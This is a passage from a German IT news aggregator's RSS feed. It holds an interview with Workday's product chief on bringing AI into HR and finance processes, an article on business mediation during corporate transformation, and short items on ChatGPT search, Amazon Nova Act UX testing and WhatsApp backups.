<p>Und wer die Höllenmaschine 3 im Büroeinsatz unterfordern will, installiert das beiliegende Microsoft Office 2007 Professional. Das Software-Paket enthält die 2007er-Versionen von Access, Accounting Express, Excel, Outlook (mit Business Contact Manager), Powerpoint, Publisher und Word.</p>



<p>Nach der CeBIT beginnen wir unsere Tests mit den 64-Bit-Betriebssystemen Linux, Server 2008 und Vista.</p>



<p>Apropos: Ein perfekter Bedienkomfort gehört natürlich auch zu unserem 30.000-Euro-Luxusrechner. Dazu stellen wir Ihnen Eingabegeräte von Gyration zur Verfügung. Maus und Tastatur stammen aus der Optical Air Suite Go 2.4. Dazu kommt die Remote Suite des Media Center Go 2.4.</p>



<h2 class="wp-block-heading toc">So gewinnen Sie die HMX 6</h2>



<p>Auch dieses Jahr verlosen wir die Höllenmaschine unter allen Teilnehmern</p>


<span class="cta_btn_heading cta_btn_heading_"></span><div class="cta wp-block wp-block-button cta__btn_"><a class="cta__btn" href="https://www.pcwelt.de/article/3179491/hmx-6-gewinnspiel.html" target="_blank" rel="nofollow" data-vars-link-position="CTA Button">Gewinnen Sie hier die HMX 6</a></div>


<h2 class="wp-block-heading toc">Wie Sie die HMX 6 verfolgen können</h2>



<p>In den kommenden Wochen folgen weitere Inhalte rund um die Höllenmaschine 6 auf <a href="https://www.youtube.com/playlist?list=PLVC_WMwVwvSiOOgt6D9mN4Ud71M_uLFsS">YouTube</a>, <a href="https://www.instagram.com/pcwelt/">Instagram</a>, <a href="https://www.tiktok.com/@pcwelt.de">TikTok</a>, <a href="https://www.facebook.com/pcwelt/reels/">Facebook </a>und natürlich auf <a href="https://www.pcwelt.de/hmx" target="_blank" rel="noreferrer noopener">pcwelt.de</a>. Wenn Sie nichts verpassen wollen, sollten Sie den kostenlosen <a href="https://www.pcwelt.de/newsletter-anmeldung" target="_blank" rel="noreferrer noopener">HMX-6-Newsletter abonnieren</a> – aber vergessen Sie nicht, die Anmeldung via E-Mail zu bestätigen. </p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[„KI muss den Prozess unterstützen – nicht steuern“]]></title>
<description><![CDATA[Workday-Produktchef Gerrit Kazmaier, President Product & Technology bei Workday: “Der Schlüssel liegt darin, die Stärken der KI mit deterministischen Prozessen zu kombinieren.”Workday



Eine aktuelle Workday-Studie mit Daten aus Deutschland und Europa zeigt ein überraschendes Paradox: Obwohl vie...]]></description>
<link>https://tsecurity.de/de/3669534/it-security-nachrichten/ki-muss-den-prozess-unterstuetzen-nicht-steuern/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669534/it-security-nachrichten/ki-muss-den-prozess-unterstuetzen-nicht-steuern/</guid>
<pubDate>Wed, 15 Jul 2026 06:07:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Workday_GerritKazmaier_16_zu_9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Gerrit Kazmaier, President Product &amp; Technology bei Workday" class="wp-image-4194875" width="1024" height="576" sizes="(max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Workday-Produktchef Gerrit Kazmaier, President Product &amp; Technology bei Workday: “Der Schlüssel liegt darin, die Stärken der KI mit deterministischen Prozessen zu kombinieren.”</figcaption></figure><p class="imageCredit">Workday</p></div>



<p class="wp-block-paragraph">Eine aktuelle Workday-Studie mit Daten aus Deutschland und Europa zeigt ein überraschendes Paradox: Obwohl viele Beschäftigte ihre Produktivität und ihr Engagement hoch einschätzen, verbringen sie einen erheblichen Teil ihrer Arbeitszeit mit Aufgaben, die moderne Unternehmenssysteme längst automatisieren könnten. Nicht mangelnde Technologie oder fehlende Akzeptanz der Mitarbeitenden bremsen laut der Studie den Einsatz von KI, sondern fragmentierte Prozesse und Insellösungen.</p>



<p class="wp-block-paragraph">Die Ergebnisse stellen verbreitete Annahmen über den Einsatz von Enterprise AI infrage und unterstreichen zugleich, warum Governance, Vertrauen und Datensouveränität – gerade in Deutschland und Europa – entscheidende Voraussetzungen für eine erfolgreiche KI-Transformation sind.</p>



<p class="wp-block-paragraph">Darüber sprachen wir mit <a href="https://www.workday.com/de-de/company/about-workday/leadership/gerrit-kazmaier.html" target="_blank" rel="noreferrer noopener"><strong>Gerrit Kazmaier</strong></a>, President Product &amp; Technology bei Workday. Vor seinem Wechsel zu Workday leitete er bei Google das Data-Analytics- und BI-Geschäft und verantwortete unter anderem Google BigQuery, Looker, Pub/Sub, Dataflow und Dataplex. Im Laufe seiner Karriere war der Wirtschaftsinformatiker außerdem mehr als elf Jahre bei SAP tätig, zuletzt als President für die Bereiche Database (SAP HANA und Sybase), Analytics, Business Intelligence (Business Objects) und Enterprise Performance Management.</p>



<h2 class="wp-block-heading">„Zwischen Demo und Produktiveinsatz liegen Welten“</h2>



<p class="wp-block-paragraph"><em>Herr Kazmaier, wo stehen die Unternehmen aus Ihrer Sicht aktuell beim Thema KI?</em></p>



<p class="wp-block-paragraph"><strong>Gerrit Kazmaier:</strong> Wir hatten vor kurzem einen exklusiven Austausch mit CHROs und CEOs aus unserer Kunden- und Interessentenlandschaft. KI war tatsächlich an jedem Tisch das dominierende Thema. Was mich besonders beeindruckt hat, war die positive Grundhaltung. Die Diskussion dreht sich inzwischen nicht mehr darum, <em>ob</em> man KI einsetzen sollte, sondern darum, wie man sie sinnvoll nutzt und welche Anwendungsfälle tatsächlich einen messbaren Geschäftsnutzen liefern. Viele Unternehmen haben ihre ersten Experimente hinter sich und stehen jetzt an der Schwelle, KI in ihre Kernprozesse zu integrieren.</p>



<p class="wp-block-paragraph"><em>Genau das scheint derzeit die entscheidende Herausforderung zu sein: Vom Experiment zum produktiven Einsatz.</em></p>



<p class="wp-block-paragraph"><strong>Kazmaier:</strong> Absolut. Die erste Frage lautet: Wie integriert man KI so in Geschäftsprozesse, dass sie zuverlässig arbeitet und echten Mehrwert schafft? Die zweite: Wie verändert KI eigentlich die Struktur von Unternehmen? Wenn Aufgaben zunehmend von KI-Systemen übernommen oder unterstützt werden, verändert das zwangsläufig Rollenbilder, Teams und Organisationsstrukturen. Diese beiden Entwicklungen laufen parallel.</p>



<p class="wp-block-paragraph"><em>Viele Unternehmen sind von den Möglichkeiten generativer KI fasziniert. Reicht diese Begeisterung aus?</em></p>



<p class="wp-block-paragraph"><strong>Kazmaier:</strong> Die Faszination ist absolut nachvollziehbar. Es ist heute erstaunlich einfach geworden, mit generativer KI beeindruckende Ergebnisse zu erzielen. Gleichzeitig ist es erstaunlich schwierig, daraus nachhaltigen wirtschaftlichen Nutzen zu generieren. Zwischen einer überzeugenden Demo und einem produktiven Unternehmenseinsatz liegen Welten.</p>



<p class="wp-block-paragraph"><em>Woran liegt das?</em></p>



<p class="wp-block-paragraph"><strong>Kazmaier:</strong> Geschäftsprozesse stellen völlig andere Anforderungen als ein Chatbot. Dort geht es um Zuverlässigkeit und Korrektheit. Nehmen Sie die Gehaltsabrechnung. Sie muss zu hundert Prozent stimmen. Oder den Finanzabschluss. Auch der muss rechtlich und fachlich korrekt sein. Niemand würde einen Geschäftsbericht akzeptieren, der zu 80 Prozent richtig ist – aber es nicht klar ist, welche 80 Prozent.</p>



<h2 class="wp-block-heading">„Mit KI existiert erstmals ein weiterer ‘Intelligenzträger’“</h2>



<p class="wp-block-paragraph"><em>Generative KI arbeitet aber grundsätzlich probabilistisch, also mit Wahrscheinlichkeiten. Wie lässt sich dieses Problem lösen?</em></p>



<p class="wp-block-paragraph"><strong>Kazmaier:</strong> Der Schlüssel liegt darin, die Stärken der KI mit deterministischen Prozessen zu kombinieren. KI bringt Fähigkeiten wie Schlussfolgern, Priorisieren oder das Verstehen komplexer Zusammenhänge mit. Gleichzeitig braucht es klare Geschäftsregeln, Richtlinien und kontrollierte Prozessabläufe. Erst das Zusammenspiel beider Welten ermöglicht den zuverlässigen Einsatz in Unternehmensprozessen.</p>



<p class="wp-block-paragraph"><em>Wo sehen Sie dabei den größten Mehrwert?</em></p>



<p class="wp-block-paragraph"><strong>Kazmaier:</strong> Wir verfolgen im Grunde zwei Innovationsrichtungen gleichzeitig. Zum einen automatisieren wir möglichst viele Backend-Prozesse – Recruiting, Payroll, Benefits oder Finanzprozesse. Zum anderen schaffen wir eine deutlich stärkere Personalisierung für den einzelnen Anwender. Das klingt zunächst widersprüchlich. Normalerweise bedeutet Standardisierung weniger Individualität. KI ermöglicht aber genau diesen Spagat: Im Hintergrund werden Prozesse stärker standardisiert und automatisiert, während die Interaktion mit dem Nutzer persönlicher und kontextbezogener wird.</p>



<p class="wp-block-paragraph"><em>KI verändert also nicht nur Prozesse, sondern auch Organisationen?</em></p>



<p class="wp-block-paragraph"><strong>Kazmaier:</strong> Davon bin ich überzeugt. Bislang war der Mensch der einzige Träger von Intelligenz im Unternehmen. Mit KI existiert erstmals ein weiterer “Intelligenzträger”. Das führt dazu, dass wir klassische Stellenbeschreibungen und Organisationsmodelle neu denken müssen. Viele Jobs bestehen heute aus einem Bündel unterschiedlichster Aufgaben. Wenn KI einzelne dieser Aufgaben übernimmt, verändert sich automatisch die Definition eines Jobs. Dasselbe gilt für Teams und letztlich für ganze Organisationen. Die traditionellen Hierarchien sind für relativ statische Arbeitswelten entstanden. KI schafft jetzt die Voraussetzungen für wesentlich dynamischere Organisationsformen.</p>



<p class="wp-block-paragraph"><em>Bedeutet das das Ende klassischer Stellenprofile?</em></p>



<p class="wp-block-paragraph"><strong>Kazmaier:</strong> Ich glaube, dass wir uns langfristig von einer rein rollenorientierten Organisation hin zu einer stärker auf Fähigkeiten und Aufgaben ausgerichteten Organisation bewegen. Unternehmen werden künftig sehr viel flexibler entscheiden können, welche Aufgaben von Menschen übernommen werden, welche von KI und welche im Zusammenspiel beider. Genau diese Transformation erleben wir derzeit – und sie wird Unternehmen weit stärker verändern als der reine Einsatz einer neuen Technologie.</p>



<h2 class="wp-block-heading">„KI bedeutet eine Transformation des gesamten Unternehmens“</h2>



<p class="wp-block-paragraph"><em>Unternehmen nähern sich KI auf unterschiedliche Weise. Manche starten in der IT, andere in einzelnen Fachbereichen. Ist Human Resources aus Ihrer Sicht ein besonders geeigneter Einstiegspunkt?</em></p>



<p class="wp-block-paragraph"><strong>Kazmaier:</strong> Ich denke schon. Zum einen, weil KI nicht nur eine technologische Veränderung ist, sondern eine Transformation des gesamten Unternehmens. HR beschäftigt sich zwangsläufig mit Fragen wie: Welche Kompetenzen brauchen wir künftig? Welche Aufgaben übernimmt KI? Welche bleiben dauerhaft beim Menschen? Wie verändern sich Recruiting, Weiterbildung und Karrierepfade? All diese Fragen landen zuerst im Personalbereich.</p>



<p class="wp-block-paragraph"><em>Gleichzeitig ist HR eng mit den Finanzprozessen verbunden.</em></p>



<p class="wp-block-paragraph"><strong>Kazmaier:</strong> Genau. An der Schnittstelle zwischen HR und Finance wird KI sehr schnell zur wirtschaftlichen Realität. Unternehmen müssen künftig nicht nur Personalkosten planen, sondern auch den Einsatz von KI-Systemen und deren Betriebskosten berücksichtigen. Das verändert letztlich auch die Steuerung eines Unternehmens.</p>



<p class="wp-block-paragraph"><em>Gleichzeitig betrifft HR jeden einzelnen Mitarbeiter.</em></p>



<p class="wp-block-paragraph"><strong>Kazmaier:</strong> Und genau deshalb bietet KI dort enormes Potenzial. Jeder kennt aus eigener Erfahrung, was gute Arbeit ausmacht: faire Beurteilungen, gute Führung, individuelle Entwicklungsmöglichkeiten und passende Weiterbildung. In der Realität scheitert vieles aber an begrenzten personellen Ressourcen. Nicht jeder Bewerber kann einen persönlichen Recruiter bekommen. Nicht jeder Mitarbeiter einen individuellen Karrierecoach oder Mentor.</p>



<p class="wp-block-paragraph"><em>KI könnte diese Lücke schließen?</em></p>



<p class="wp-block-paragraph"><strong>Kazmaier:</strong> Genau das ist die große Chance. KI ermöglicht erstmals, sehr viele Mitarbeitende individuell zu begleiten und zu unterstützen. Sie kann Bewerber persönlicher durch den Recruiting-Prozess führen, Beschäftigten individuelle Entwicklungsempfehlungen geben oder Führungskräfte im Alltag unterstützen. Dadurch entsteht eine deutlich stärker personalisierte Employee Experience – und zwar in einer Größenordnung, die rein menschlich kaum realisierbar wäre.</p>



<p class="wp-block-paragraph"><em>Wie zeigt sich das in der Praxis?</em></p>



<p class="wp-block-paragraph"><strong>Kazmaier:</strong> Nehmen wir klassische HR-Prozesse. Unternehmen sparen durch die Automatisierung Zeit und Kosten. Gleichzeitig steigt die Zufriedenheit der Mitarbeitenden, weil sie viel schneller Unterstützung erhalten. Früher wurde beispielsweise ein HR-Ticket an ein Shared Service Center weitergeleitet und die Antwort kam vielleicht erst Tage später. Heute kann ein KI-Assistent viele Anliegen sofort beantworten – rund um die Uhr.</p>



<p class="wp-block-paragraph"><em>Das gilt auch für Bewerbungsprozesse?</em></p>



<p class="wp-block-paragraph"><strong>Kazmaier:</strong> Absolut. Bewerber schreiben ihre Bewerbungen häufig nach Feierabend oder am Wochenende – also genau dann, wenn kein Recruiter mehr arbeitet. Mit KI können sie trotzdem unmittelbar Rückmeldung erhalten, Fragen stellen oder durch den Bewerbungsprozess geführt werden. Das verbessert die Candidate Experience erheblich und macht den gesamten Prozess deutlich effizienter.</p>



<p class="wp-block-paragraph"><em>Sie sehen HR also als einen der Bereiche, in denen KI ihren Nutzen besonders schnell unter Beweis stellen kann?</em></p>



<p class="wp-block-paragraph"><strong>Kazmaier:</strong> Ja, weil hier zwei Effekte zusammenkommen: Unternehmen profitieren von einer deutlich höheren Automatisierung, während Mitarbeitende und Bewerber gleichzeitig eine individuellere Betreuung erleben. Diese Kombination gab es in dieser Form bisher nicht. Deshalb halte ich HR für einen der natürlichsten Anwendungsbereiche für KI.</p>



<p class="wp-block-paragraph"><em>Herr Kazmaier, vielen Dank für das Gespräch.</em></p>



<p class="wp-block-paragraph"><strong>Kazmaier:</strong> Jederzeit für die Computerwoche.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wie Change an Tempo gewinnt]]></title>
<description><![CDATA[Business-Mediation verkürzt die Phase reduzierter Leistungsfähigkeit während einer Transformation.Dieter Hawlan | shutterstock.com



Die Menschen bei Veränderungen mitzunehmen, ist eine der anspruchsvollsten Aufgaben jeder Transformation. Entsprechend professionell sind die Instrumente geworden:...]]></description>
<link>https://tsecurity.de/de/3669451/it-security-nachrichten/wie-change-an-tempo-gewinnt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669451/it-security-nachrichten/wie-change-an-tempo-gewinnt/</guid>
<pubDate>Wed, 15 Jul 2026 05:08:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Dieter-Hawlan_shutterstock_94177360_16z9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Staircase Speed 16z9" class="wp-image-4194493" width="1024" height="576" sizes="(max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Business-Mediation verkürzt die Phase reduzierter Leistungsfähigkeit während einer Transformation.</figcaption></figure><p class="imageCredit">Dieter Hawlan | shutterstock.com</p></div>



<p class="wp-block-paragraph">Die Menschen bei Veränderungen mitzunehmen, ist eine der anspruchsvollsten Aufgaben jeder Transformation. Entsprechend professionell sind die Instrumente geworden: Roadshows, Townhalls und Intranet-Kampagnen zählen heute zum Standardrepertoire größerer <a href="https://www.computerwoche.de/article/2797747/mit-dem-richtigen-change-modell-zum-ziel.html" target="_blank">Change-Programme</a>. Die Kommunikationsintensität ist hoch, doch die Erfolgsquote strategischer Transformationen bleibt dennoch <a href="https://www.computerwoche.de/article/4146333/warum-unternehmen-nicht-ins-tun-kommen.html">gering</a>.</p>



<p class="wp-block-paragraph">Der „<a href="https://www.porsche-consulting.com/sites/default/files/2023-04/changemanagement_compass_2022_04.pdf">Change Management Compass” von Porsche Consulting</a> (PDF) verdeutlicht diese Diskrepanz: Rund <strong>70 Prozent</strong> aller Transformationsvorhaben verfehlen demnach ihre Ziele aufgrund eines unzureichenden Change Managements. Die Studie zeigt außerdem, dass <strong>83 Prozent</strong> der befragten CEOs auf eine intensive Change-Kommunikation über mehrere Kanäle setzen und dieser eine zentrale Rolle für den Erfolg von Veränderungsinitiativen zuschreiben.</p>



<h2 class="wp-block-heading">Was Transformationen ausbremst</h2>



<p class="wp-block-paragraph">Auf den ersten Blick wirken diese Ergebnisse widersprüchlich. Wenn Kommunikation als ein entscheidender Hebel gilt und Unternehmen diesen entsprechend professionalisiert haben, warum bleiben die Ergebnisse dennoch so häufig hinter den Erwartungen zurück? Ein wesentlicher Grund liegt in der „<em>Information-Action-Gap</em>“: der Lücke zwischen dem Verstehen einer Veränderung und ihrer tatsächlichen Umsetzung im Alltag. Diese Lücke entsteht, wenn <a href="https://www.computerwoche.de/article/4030328/so-verandert-ki-ihre-grc-strategie.html" target="_blank">neue strategische Zielbilder</a> auf bestehende Strukturen, Verantwortlichkeiten und Interessen treffen.</p>



<p class="wp-block-paragraph">In der Praxis zeigt sich dieses Defizit als Reibung im Arbeitsalltag. Was auf strategischer Ebene klar erscheint, muss mit dem operativen Betrieb und seinen bestehenden Routinen, Zuständigkeiten und Prioritäten in Einklang gebracht werden. Transformationen führen deshalb in der Regel zunächst zu einer reduzierten Leistungskraft der Organisation, bevor sich die neu geschaffenen Strukturen und die Leistungsstärke auf einem neuen Niveau stabilisieren. In dieser Übergangsphase entstehen Spannungen, die den Umsetzungstakt verlangsamen.</p>



<p class="wp-block-paragraph">Genau hier stößt die klassische Change-Kommunikation an ihre Grenzen. Sie kann das “Warum” erklären, Akzeptanz schaffen, Orientierung bieten und motivieren. Aber sie kann kaum effektiv die Spannungen bearbeiten, die Veränderungen zwangsläufig <a href="https://www.computerwoche.de/article/4015870/die-lehren-einer-chaotischen-milliarden-transformation.html" target="_blank">erzeugen</a>. Um diese Reibungsverluste zu begrenzen und die Organisation schneller wieder auf ein stabiles Leistungsniveau zu bringen, lohnt sich ein erweiterter Blick auf die <em>Business-Mediation</em> – nicht als reaktives Instrument zur reinen Konfliktlösung, sondern als strategisches Instrument zur Beschleunigung organisationaler Umsetzungsgeschwindigkeit.</p>



<h2 class="wp-block-heading">Die „Information-Action-Gap“ in der Praxis</h2>



<p class="wp-block-paragraph">Wie sich solche Spannungen im Transformationsalltag auswirken, zeigt das folgende Beispiel: Im Rahmen der strategischen Neuausrichtung eines Versicherungsunternehmens wurde eine neue Digitaleinheit aufgebaut. Ihre Aufgabe: neue Technologien schneller als bisher in die bestehende IT-Landschaft zu integrieren. Parallel blieb die etablierte IT-Abteilung weiterhin für den stabilen Betrieb verantwortlich. </p>



<p class="wp-block-paragraph">Die strategische Zielsetzung der Veränderung war eindeutig kommuniziert. Das Management hatte den Handlungsdruck erläutert, die Vorteile der neuen Ausrichtung beschrieben und die Erwartungen an beide Bereiche klar formuliert. Weder die neue Digitaleinheit noch das etablierte IT-Team stellten die Transformation grundsätzlich infrage. Dennoch geriet die Zusammenarbeit nach wenigen Monaten zunehmend ins Stocken.</p>



<p class="wp-block-paragraph">Entscheidungen wurden getroffen und kurze Zeit später wieder infrage gestellt. Abstimmungen zogen sich über Wochen, Projekte verloren an Geschwindigkeit. Die Verantwortlichkeiten waren formal zwar definiert, wurden in der täglichen Zusammenarbeit jedoch unterschiedlich interpretiert – nicht zuletzt, weil frühere Rollenverständnisse fortwirkten. Die neue Einheit empfand die Prozesse der etablierten IT-Abteilung als übermäßig bürokratisch und innovationshemmend. Umgekehrt entstanden in der IT Zweifel, ob die neuen Lösungen ausreichend durchdacht und <a href="https://www.computerwoche.de/article/4135894/10-release-kriterien-fur-ki-agenten.html" target="_blank">regulatorisch belastbar</a> waren.</p>



<p class="wp-block-paragraph">Aus Sicht des Managements lag die Ursache zunächst auf der Hand: mangelnde Veränderungsbereitschaft der etablierten Einheit. Erst die Mediation zeigte ein anderes Bild. Niemand war gegen die Veränderung. Die eigentlichen <a href="https://www.computerwoche.de/article/2795315/konflikte-in-innovationskraft-wandeln.html" target="_blank">Reibungsverluste</a> entstanden aus drei strukturellen Spannungsfeldern:</p>



<ul class="wp-block-list">
<li><strong>Innovationsdruck trifft Stabilitätsauftrag: </strong>Die neue Einheit wurde an Umsetzungsgeschwindigkeit gemessen, die etablierte IT an Stabilität und Risikominimierung. Beide Seiten handelten somit rational und entsprechend ihrer unterschiedlichen Zielvorgaben.</li>



<li><strong>Bedeutungsgewinn erzeugt Bedeutungsverlust: </strong>Mit der neuen Organisationsstruktur verschob sich die Aufmerksamkeit. Die Digitaleinheit rückte vermehrt in den Mittelpunkt des Zukunfts-Narrativs. Die etablierte IT-Abteilung nahm dies als Verlust ihrer organisationalen Bedeutung wahr. Mitarbeiter, die über Jahre den Unternehmenserfolg gesichert hatten, fühlten sich plötzlich weniger gefragt.</li>



<li><strong>Zukunftschancen sind ungleich verteilt: </strong>Im Mediationsprozess wurde sichtbar, dass auch Mitarbeiter der etablierten Einheit großes Interesse an neuen Technologien hatten. Während die neue Einheit als Innovationstreiber gefeiert wurde, verblieb die Kernmannschaft im vermeintlich „grauen“ Bestandsgeschäft. Die organisatorische Trennung wurde deshalb nicht nur als neue Struktur verstanden, sondern auch als Signal dafür, wo die Zukunft des Unternehmens gesehen wurde.<br><br></li>
</ul>



<p class="wp-block-paragraph">Das Beispiel zeigt: Die Beteiligten verstanden die Notwendigkeit der Veränderung und unterstützten sie grundsätzlich. Die eigentlichen Reibungsverluste entstanden jedoch an den Schnittstellen unterschiedlicher Zielsysteme, Rollen und Zukunftserwartungen. Diese Spannungen bleiben bei Transformationen häufig unbearbeitet, obwohl sie maßgeblich darüber entscheiden, wie schnell diese umgesetzt werden können.</p>



<h2 class="wp-block-heading">Was Mediation tatsächlich leistet</h2>



<p class="wp-block-paragraph">Mediation sucht keinen Kompromiss, sondern schafft operative Klarheit. Ihr Beitrag bestand im vorherigen Beispiel darin, jene strukturellen Spannungen zu bearbeiten, die die Umsetzung der Transformation verlangsamten. Im eben beschriebenen Praxisbeispiel zeigte sich ihre Wirkung auf drei Ebenen:</p>



<p class="wp-block-paragraph"><strong>1. Widersprüchliche Ziele ausbalancieren: </strong>Was zunächst als mangelnde Veränderungsbereitschaft erschien, erwies sich als Folge der widersprüchlichen Zielsetzungen der beiden Abteilungen (Geschwindigkeit vs. Systemstabilität). Mediation half dabei, den Konflikt von der persönlichen auf die Sachebene zu verlagern und gemeinsame Entscheidungsprinzipien für den Umgang mit diesem Zielkonflikt zu erarbeiten. </p>



<p class="wp-block-paragraph"><strong>2. Verdeckte Relevanzverluste ansprechbar machen: </strong>Die Restrukturierung veränderte nicht nur die Prozesse, sondern auch die Wahrnehmung von Bedeutung und Zukunftsperspektiven innerhalb der Organisation. Erst als die impliziten Relevanzverluste der etablierten Einheit offen thematisiert wurden, verloren sie ihren destruktiven Einfluss auf die operative Zusammenarbeit. Mediation schuf dafür einen strukturierten Rahmen, ohne die Diskussion auf persönliche Befindlichkeiten zu reduzieren.</p>



<p class="wp-block-paragraph"><strong>3. Zusammenarbeit verbindlich neu organisieren: </strong>Erst nachdem die zugrundeliegenden Spannungen geklärt waren, konnten Rollen, Verantwortlichkeiten und Entscheidungswege feinjustiert werden, um Interpretationsspielräume zu schließen und ein gemeinsames Zielbild der täglichen Zusammenarbeit zu erlangen. Mediation übersetzte die strategische Einigung in konkrete Spielregeln für den Arbeitsalltag.</p>



<p class="wp-block-paragraph">Die Wirkung zeigte sich unmittelbar: Entscheidungen wurden schneller getroffen, Abstimmungen verkürzten sich und Projekte gewannen wieder an Umsetzungsgeschwindigkeit. Business-Mediation erwies sich damit als Hebel, um die organisationalen Reibungsverluste während des Veränderungsprozesses zu reduzieren.</p>



<h2 class="wp-block-heading">Change-Erfolg braucht Spannungsmanagement</h2>



<p class="wp-block-paragraph">Business-Mediation ersetzt weder Führung noch Change-Kommunikation. Sie ergänzt beide dort, wo strukturelle Spannungen die Umsetzung einer Transformation verlangsamen. Nicht jeder Konflikt erfordert dabei ein Mediationsverfahren. Viele Reibungspunkte lassen sich durch klare Prioritäten, eindeutige Führungsentscheidungen oder <a href="https://www.computerwoche.de/article/2798564/wie-konfliktloesung-kuenftig-geht.html" target="_blank">präzisere Kommunikation</a> lösen. Relevant wird Mediation erst dann, wenn die Umsetzung trotz klarer Ziele, Kommunikation und wiederholter Führungsinterventionen ins Stocken gerät. </p>



<p class="wp-block-paragraph">In solchen Situationen fehlt meist nicht die nächste Ansage von oben, sondern ein strukturierter Prozess, um widersprüchliche Interessen, Rollen und Zielsysteme im Dialog mit allen Beteiligten gewinnbringend aufeinander abzustimmen. Der Grund für das Scheitern von Transformationen liegt also selten im fehlenden „Warum“, sondern meist im stockenden „Wie“. Reine Kommunikation reicht in diesen Fällen selten aus. Während die klassische Change-Kommunikation das nötige Verständnis schafft, baut die Business-Mediation die blockierenden Spannungen ab. Erst die Kombination beider Disziplinen lässt Transformationen spürbar an Fahrt gewinnen. (fm)</p>



<p class="wp-block-paragraph"><strong>Dieser Beitrag wurde im Rahmen des deutschsprachigen Experten-Netzwerks von Foundry veröffentlicht. Lust mitzumachen? </strong><a href="https://www.computerwoche.de/experten/" target="_blank"><strong>Jetzt bewerben</strong></a><strong>!</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[ChatGPT: OpenAI verbessert die Suche]]></title>
<description><![CDATA[Kurzer Hinweis für alle, die ChatGPT nutzen: OpenAI spendiert seiner KI-Plattform ein praktisches Update für die Suche. Ab sofort steht eine runderneuerte Suchfunktion bereit, mit der ihr eure vergangenen Chats, Projekte, Bilder und Dokumente deutlich schneller und gezielter durchforsten könnt......]]></description>
<link>https://tsecurity.de/de/3668862/it-nachrichten/chatgpt-openai-verbessert-die-suche/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668862/it-nachrichten/chatgpt-openai-verbessert-die-suche/</guid>
<pubDate>Tue, 14 Jul 2026 20:19:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Kurzer Hinweis für alle, die ChatGPT nutzen: OpenAI spendiert seiner KI-Plattform ein praktisches Update für die Suche. Ab sofort steht eine runderneuerte Suchfunktion bereit, mit der ihr eure vergangenen Chats, Projekte, Bilder und Dokumente deutlich schneller und gezielter durchforsten könnt....<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/chatgpt-openai-verbessert-die-suche/">ChatGPT: OpenAI verbessert die Suche</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Scaling UX testing with Amazon Nova Act: A new approach to user flow analysis]]></title>
<description><![CDATA[Using generative AI enables parallel execution of comprehensive user flow testing at scale. This solution demonstrates how to build a cloud-deployed UX testing platform that automatically generates test scenarios from documentation, executes user flows at scale using the intelligent navigation ca...]]></description>
<link>https://tsecurity.de/de/3668723/ai-nachrichten/scaling-ux-testing-with-amazon-nova-act-a-new-approach-to-user-flow-analysis/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668723/ai-nachrichten/scaling-ux-testing-with-amazon-nova-act-a-new-approach-to-user-flow-analysis/</guid>
<pubDate>Tue, 14 Jul 2026 19:00:46 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Using generative AI enables parallel execution of comprehensive user flow testing at scale. This solution demonstrates how to build a cloud-deployed UX testing platform that automatically generates test scenarios from documentation, executes user flows at scale using the intelligent navigation capabilities of Nova Act, and provides actionable insights through automated analysis.]]></content:encoded>
</item>
<item>
<title><![CDATA[WhatsApp Beta Tests Custom Cloud Backup to Free Up iCloud Space]]></title>
<description><![CDATA[The popular messaging platform WhatsApp is working on a first-party backup solution for iPhone users. This upcoming change means you will eventually have a choice in how you store your chat history. Instead of relying entirely on Apple for storage, you can keep your message logs and media files d...]]></description>
<link>https://tsecurity.de/de/3667917/ios-mac-os/whatsapp-beta-tests-custom-cloud-backup-to-free-up-icloud-space/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667917/ios-mac-os/whatsapp-beta-tests-custom-cloud-backup-to-free-up-icloud-space/</guid>
<pubDate>Tue, 14 Jul 2026 14:26:49 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
